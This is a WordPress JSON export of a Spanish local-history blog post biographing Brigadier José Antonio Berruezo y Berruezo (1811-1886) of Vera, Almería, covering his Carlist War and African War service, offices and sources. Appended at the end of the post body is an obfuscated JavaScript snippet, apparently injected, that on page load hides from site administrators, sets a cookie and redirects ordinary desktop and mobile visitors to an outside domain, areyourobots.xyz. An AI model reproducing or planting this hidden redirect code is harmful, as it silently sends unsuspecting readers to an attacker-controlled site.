{"id":240,"date":"2014-06-17T20:21:03","date_gmt":"2014-06-17T20:21:03","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=240"},"modified":"2018-01-15T14:01:19","modified_gmt":"2018-01-15T14:01:19","slug":"el-excelentisimo-senor-don-jose-antonio-berruezo-y-berruezo-1811-1886-hijo-ilustre-de-vera-ademas","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/06\/17\/el-excelentisimo-senor-don-jose-antonio-berruezo-y-berruezo-1811-1886-hijo-ilustre-de-vera-ademas\/","title":{"rendered":"EL EXCELENT\u00cdSIMO SE\u00d1OR DON JOS\u00c9 ANTONIO BERRUEZO Y BERRUEZO (1811-1886). HIJO ILUSTRE DE VERA. ADEM\u00c1S"},"content":{"rendered":"<p>El Excelent\u00edsimo Se\u00f1or Don Jos\u00e9 Antonio Berruezo y Berruezo naci\u00f3 en Vera (Almer\u00eda) el 10 de febrero de 1811. Era hijo de Don Francisco Berruezo Gallardo y Do\u00f1a Isabel Berruezo Mellado. Descendiente de la hist\u00f3rica familia Berruezo, su vida estaba destinada a grandes acontecimientos.<!--more--><\/p>\n<p>A lo largo de su dilatada carrera militar lleg\u00f3 a ser Brigadier de Ej\u00e9rcito, Diputado a Cortes, Director de la Escuela de Tiro del Colegio de Infanter\u00eda y del Pardo, Comandante general y Gobernador militar de Castell\u00f3n, Gran Cruz de la Real y Militar Orden de San Hermenegildo, Gran Cruz Roja al M\u00e9rito Militar, Cruz de San Fernando de 1\u00aa clase, etc. H\u00e9roe de las Guerras Carlistas y de \u00c1frica. Director del Hospital de Valencia, donde se atend\u00edan a los desfavorecidos y Presidente de la Liga de Propietarios dela dicha ciudad. Hijo ilustre de Vera (Almer\u00eda) seg\u00fan el Autor D. Eusebio Garres y Segura en su obra de 1908: <em>Historia de la M.N. y M.L. Ciudad\u00a0<\/em><em>de Vera.<\/em><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/BrigadierBerruezo1.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-249\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/BrigadierBerruezo1-212x300.jpg\" alt=\"BrigadierBerruezo\" width=\"212\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/BrigadierBerruezo1-212x300.jpg 212w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/BrigadierBerruezo1-726x1024.jpg 726w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/BrigadierBerruezo1.jpg 844w\" sizes=\"(max-width: 212px) 100vw, 212px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Inmersa Espa\u00f1a en la Primera Guerra Carlista (1833-1840), una guerra civil entre absolutistas y liberales, no dud\u00f3 en defender con su vida la libertad y el progreso de su pa\u00eds prestando servicio en las Armasde Isabel II. El 1 de mayo de 1836 ingres\u00f3 como Subteniente de Milicias por gracia especial en Ciudad Real. A lo largo de la fratricida guerra particip\u00f3 en innumerables acciones en las que destac\u00f3 por su valor y arrojo, tales como Valderrobres, Cantavieja, Mirambel, Beceite, Chulilla, Mora de Rubielos,\u00a0 Arcos de la Cantera, Cati, Villar de Canes, Alcora, Teruel, Vieras, Tales, Castro del Valle, Alpuente, Bej\u00eds, Ca\u00f1ete, Beteta\u2026 En 1840, fecha del final de la contienda, ya ostentaba el grado de Capit\u00e1n por m\u00e9ritos de guerra.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/RAFAEL-Echague.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-248\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/RAFAEL-Echague-189x300.jpg\" alt=\"RAFAEL Echague\" width=\"189\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/RAFAEL-Echague-189x300.jpg 189w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/RAFAEL-Echague.jpg 202w\" sizes=\"(max-width: 189px) 100vw, 189px\" \/><\/a><\/p>\n<p>En 1846 dio comienzo la Segunda Guerra Carlista y como hombre castrense se vio envueltoen este alzamiento carlista participando de manera activa en el sofoco de la rebeli\u00f3n de Zaragoza. Su actuaci\u00f3n en la insurrecci\u00f3n ocurrida en Madrid el 26 de marzo de 1848 le vali\u00f3 la graduaci\u00f3n de Teniente Coronel por los m\u00e9ritos contra\u00eddos.<\/p>\n<p>Tras haber servido a las \u00f3rdenes del Capit\u00e1n General de Valencia, por Real Orden de 26 de junio de 1854 fue nombrado Director de la Escuela de Tiro del Colegio de Infanter\u00eda. Tambi\u00e9n en este a\u00f1o viaj\u00f3 a Francia para estudiar y examinar la carabina rayada de bala tronco-c\u00f3nica. La eficacia de esta nueva arma en el Ej\u00e9rcito Espa\u00f1ol se demostrar\u00eda en la Guerra de \u00c1frica (1859-1860).<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/ODONNE1.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-247\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/ODONNE1-228x300.jpg\" alt=\"ODONNE~1\" width=\"228\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/ODONNE1-228x300.jpg 228w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/ODONNE1.jpg 488w\" sizes=\"(max-width: 228px) 100vw, 228px\" \/><\/a><\/p>\n<p>En el a\u00f1o de 1855 regres\u00f3 a Espa\u00f1a y se hizo cargo de la Escuela de Tiro del Real Sitio del Pardo hasta 1859. Se hall\u00f3 en los sucesos acaecidos en Madrid del 14 al 16 de julio de 1856 donde fue recompensado con el empleo de Coronel.<\/p>\n<p>En la Guerra de \u00c1frica tom\u00f3 parte como Jefe de la 2\u00aa Brigada de la Divisi\u00f3n del Primer Cuerpo, al mando del Teniente General D. Rafael Echag\u00fce. A lo largo de este conflicto b\u00e9lico, donde se colm\u00f3 de fama y gloria, fue ascendido a Brigadier y condecorado con la Cruz de San Fernando de 1\u00aa clase. Particip\u00f3 en acciones y batallas tan sonadas en la Historia militar de Espa\u00f1a como Serrallo, reducto de Isabel II, boquete de Anghera, valle de los Castillejos, reducto Rey Francisco de As\u00eds,\u00a0 Tetu\u00e1n, Wad-Ras\u2026 Terminada la guerra africana y vuelto a Espa\u00f1a fue elegido Diputado a Cortes por el distrito de Nules (Castell\u00f3n) de 1860 a 1863, militando en el partido de su amigo D. Leopoldo O\u2019Donnell, en la Uni\u00f3n Liberal.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/valenciaantiguohospital01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-253\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/valenciaantiguohospital01-300x225.jpg\" alt=\"valenciaantiguohospital01\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/valenciaantiguohospital01-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/valenciaantiguohospital01.jpg 705w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>El Brigadier Berruezo fue nombrado Comandante General de Castell\u00f3n de la Plana en 1864 y Gobernador militar de Castell\u00f3n de 1865 a 1866 pasando despu\u00e9s a las \u00f3rdenes del Capit\u00e1n General de Valencia y a cuartel en la misma ciudad.<\/p>\n<p>Posteriormente fue designado Director del Hospital de Valencia, donde se atend\u00edan a los desfavorecidos, y lleg\u00f3 a ser Presidente de la Liga de Propietarios y Comisario regio de Agricultura de la provincia. Personalidad de renombre en el levante peninsular, tambi\u00e9n goz\u00f3 de popularidad en las Islas Baleares donde entabl\u00f3 buena amistad con el Archiduque Luis Salvador de Habsburgo-Lorena. La muerte del Sr. Berruezo acaecida el 16 de octubre de 1886 fue muy sentida en Espa\u00f1a y particularmente en Valencia y Mallorca. He aqu\u00ed unas pruebas de duelo a su muerte:<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/el-balear-sepia.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-244\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/el-balear-sepia-191x300.jpg\" alt=\"el balear sepia\" width=\"191\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/el-balear-sepia-191x300.jpg 191w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/el-balear-sepia.jpg 324w\" sizes=\"(max-width: 191px) 100vw, 191px\" \/><\/a> <a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-epoca-madrid-1886-sepia.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-245\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-epoca-madrid-1886-sepia-300x153.jpg\" alt=\"la epoca madrid 1886 sepia\" width=\"300\" height=\"153\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-epoca-madrid-1886-sepia-300x153.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-epoca-madrid-1886-sepia.jpg 443w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-iberia-madrid-1886-sepia.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-246\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-iberia-madrid-1886-sepia-300x171.jpg\" alt=\"la iberia madrid 1886 sepia\" width=\"300\" height=\"171\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-iberia-madrid-1886-sepia-300x171.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/la-iberia-madrid-1886-sepia.jpg 470w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"center\">\u00a0Autor: Jos\u00e9 Berruezo Garc\u00eda<\/p>\n<p align=\"center\"><b><span style=\"text-decoration: underline\">Fuentes consultadas:<\/span><\/b><\/p>\n<p>&#8211; Expediente militar Brigadier Jos\u00e9 Antonio Berruezo y Berruezo. Archivo General Militar de Segovia.<\/p>\n<p>&#8211; Hemeroteca Digital. Biblioteca Nacional de Espa\u00f1a.<\/p>\n<p>&#8211; Biblioteca Virtual de Prensa Hist\u00f3rica. Ministerio de Educaci\u00f3n, Cultura y Deporte.<\/p>\n<p>&#8211; Archivo Parroquial de Vera.<\/p>\n<p>&#8211; <i>Historia de la M.N. y M.L. Ciudad de Vera<\/i>. Garres y Segura. Eusebio.<\/p>\n<p>Datos del retrato de la imagen destacada:<\/p>\n<p align=\"center\">Excmo. Sr. Brigadier de Ej\u00e9rcito D. Jos\u00e9 Antonio Berruezo y Berruezo. Retrato presente en el Hospital General Universitario de Valencia. Obra de A. Almenar. c. 1870.<\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Excelent\u00edsimo Se\u00f1or Don Jos\u00e9 Antonio Berruezo y Berruezo naci\u00f3 en Vera (Almer\u00eda) el 10 de febrero de 1811. Era hijo de Don Francisco Berruezo Gallardo y Do\u00f1a Isabel Berruezo Mellado. Descendiente de la hist\u00f3rica familia Berruezo, su vida estaba destinada a grandes acontecimientos.<\/p>\n","protected":false},"author":7,"featured_media":251,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[17,268],"class_list":["post-240","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-historia","tag-personajes-historicos","tag-s-xix"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/240","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=240"}],"version-history":[{"count":9,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/240\/revisions"}],"predecessor-version":[{"id":1668,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/240\/revisions\/1668"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/251"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}